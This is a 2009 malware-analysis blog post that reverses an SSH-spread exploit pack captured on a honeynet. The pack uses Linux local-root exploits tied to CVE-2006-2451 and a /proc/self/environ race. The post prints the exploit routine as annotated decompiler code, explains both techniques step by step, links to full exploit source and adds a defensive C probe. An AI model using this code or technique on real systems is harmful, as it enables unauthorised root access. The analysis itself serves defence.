Tuesday, 25 August 2009

Malware - 26xpl SSH Propagating Exploit Pack

The following application comes out of the latest honeynet capture and is part of a remote exploit pack, subsequently used to compromise other servers and build a botnet with spam capabilities.

The pack consists of three files:
  1. a.sh (bash script containing an exploit)
  2. c (ELF containing an exploit)
  3. core (obfuscated ELF containing another exploit)
a.sh is the PRCTL local root exploit (the core dump handling bug, CVE-2006-2451), an old exploit for kernels 2.6.13 <= x <= 2.6.17.4 plus 2.6.9-22.ELsmp. It is a support tool: the other infecting binaries do not carry a local privilege escalation to root of their own, so the pack ships this one alongside them.

It is worth noting that this exploit is still actively used and abused, and is bundled in a large number of exploit toolkits, especially in automated bank-phishing systems such as SmssmtpSender. That toolkit is used to compromise, manage and control a set of systems for sending SMS spam through compromised POP accounts that had weak passwords.

Let's reverse the c executable now:

After disassembling this ELF with IDA, the graph view quickly shows that the application requires a command-line argument and, if the parameters are correct, launches an exploit, as also emerges from string analysis. Now it is only a matter of understanding which exploit is executed; with a bit of string searching we can isolate the following:

file db '/proc/self/environ'

usage: binary

So the function targets '/proc/self/environ', using a big file passed on the command line as a timing aid. The idea is: chmod the process's own /proc/self/environ to 04755 while the inode still belongs to the unprivileged user, then set PR_SET_DUMPABLE to 0 so that the kernel re-owns the /proc/<pid> files to root while the set-uid mode survives, and finally have a child execute /proc/<pid>/environ, which at that moment is a root-owned, set-uid file whose content is the parent's environment. These are the operations performed by exploit() (decompiler output, with the constants annotated):

printf("\ntrying to exploit %s\n\n", file);
fflush(stdout);
chmod("/proc/self/environ", 0x9EDu);              /* 0x9ED = 04755: set-uid mode, applied while the inode is still owned by the user */
c = mmap(0, 0x1000u, 3, 33, 0, 0);                /* PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANONYMOUS: flag shared with the child */
memset(c, 0, 0x1000u);
v1 = open(file, 0);                               /* O_RDONLY: the big file given on the command line */
fildes = v1;
fstat(v1, &stat_buf);
v2 = mmap(0, stat_buf.st_size, 3, 2, fildes, 0);  /* map the whole file, MAP_PRIVATE */
addr = v2;
if ( v2 == (void *)-1 )
    error("mmap");
prctl(4, 0, 0, 0, 0);                             /* PR_SET_DUMPABLE = 0: /proc/<pid>/* now belongs to root, the 04755 mode is kept */
v3 = getpid();
sprintf(t, "/proc/%d/environ", v3);               /* the target the child will execute */
sched_yield();
execve(0, &a, &e);                                /* these two calls appear like this in the decompiler output */
madvise(0, 0, 3);
v4 = fork();
pid = v4;
if ( v4 )
{                                                 /* parent */
    ++*(_DWORD *)c;                               /* release the child */
    v5 = madvise(addr, stat_buf.st_size, 3) == 0; /* MADV_WILLNEED on the big mapping: slow operation that widens the race window */
    v10 = v5;
    if ( v5 )
    {
        prctl(4, 1, 0, 0, 0);                     /* PR_SET_DUMPABLE = 1 again */
        sched_yield();
        waitpid(pid, 0, 0);
        exit(0);
    }
    error("madvise");
}
nice(10);                                         /* child */
while ( !*(_DWORD *)c )                           /* spin until the parent signals */
    ;
sched_yield();
execve(t, &a, &e);                                /* run /proc/<parent pid>/environ: root-owned, set-uid, contents = parent's environment */
error("failed");
}

The full source code of the exploit is here: http://www.securiteam.com/exploits/5MP0E1PJ5A.html
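As an added check, not part of the original post and not code from the pack, the following C program probes the two kernel primitives the pack depends on: whether an unprivileged process may chmod() its own /proc/self/environ (what the c binary needs), and whether prctl(PR_SET_DUMPABLE, 2) is accepted (what the core dump handling exploit needs). A kernel carrying the 2006 fixes refuses both (EPERM and EINVAL respectively); a result of 0 from either probe means the pre-condition for that exploit is present. The function names and the return convention are mine; if the chmod does succeed, the original mode is restored before returning.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#ifdef __linux__
#include <sys/prctl.h>
#endif

/* Primitive 1: the c binary does chmod("/proc/self/environ", 04755) and relies
   on it succeeding while the inode still belongs to the calling user.
   Returns 0 if the chmod succeeded (vulnerable pre-condition present), otherwise
   the errno: EPERM on a fixed kernel, ENOENT where there is no procfs. */
int probe_proc_chmod(void)
{
    struct stat st;
    if (stat("/proc/self/environ", &st) != 0)
        return errno;
    if (chmod("/proc/self/environ", 04755) == 0) {
        /* Vulnerable: put the original mode back before anything else runs. */
        chmod("/proc/self/environ", st.st_mode & 07777);
        return 0;
    }
    return errno;
}

/* Primitive 2: the core dump exploit needs prctl(PR_SET_DUMPABLE, 2) so that a
   set-uid program it crashes dumps core as root into a directory of the
   attacker's choosing (the "Creating Cron entry" step).  Fixed kernels accept
   only 0 or 1.  Returns 0 if the call succeeded, the errno (EINVAL) if refused,
   -1 where prctl() is unavailable (non-Linux build). */
int probe_dumpable_two(void)
{
#ifdef __linux__
    int old = prctl(PR_GET_DUMPABLE, 0, 0, 0, 0);
    if (prctl(PR_SET_DUMPABLE, 2, 0, 0, 0) == 0) {
        if (old == 0 || old == 1)
            prctl(PR_SET_DUMPABLE, old, 0, 0, 0);   /* undo our change */
        return 0;
    }
    return errno;
#else
    return -1;
#endif
}

int main(void)
{
    int r1 = probe_proc_chmod();
    int r2 = probe_dumpable_two();
    printf("chmod /proc/self/environ : %s\n",
           r1 == 0 ? "ALLOWED (vulnerable)" : strerror(r1));
    printf("prctl(PR_SET_DUMPABLE, 2): %s\n",
           r2 == 0 ? "ALLOWED (vulnerable)" : r2 < 0 ? "n/a" : strerror(r2));
    return (r1 == 0 || r2 == 0);   /* non-zero exit = at least one primitive available */
}
```

The probe is deliberately passive: it never maps a large file, forks or executes anything under /proc, so it is safe to run on a production box during triage. A non-zero exit status means the host would still be exposed to at least one of the two exploits in this pack.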


Finally, the core ELF is obfuscated, but a quick string analysis turns up the following strings:

aCreatingCronEn db '[*] Creating Cron entry',0Ah

db ' Core Dump Handling - Local r00t',0Ah,0

A bit of Google searching again points to the Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t exploit (CVE-2006-2451). The "Creating Cron entry" string matches that exploit's technique: it sets PR_SET_DUMPABLE to 2, changes directory to /etc/cron.d and crashes a set-uid binary, so that the kernel writes a root-owned core file into the cron directory; the core image carries a crontab line that cron then picks up and runs as root.

As you can see, the pack contains only these three exploits, delivered through an SSH infection; judging from the pack name, 26xpl could derive from the shogai backdoor kit.

See you to the next post.. :)

Giuseppe 'Evilcry' Bonfa'

1 comment:

Anonymous said...

How was the 'core' ELF obfuscated?
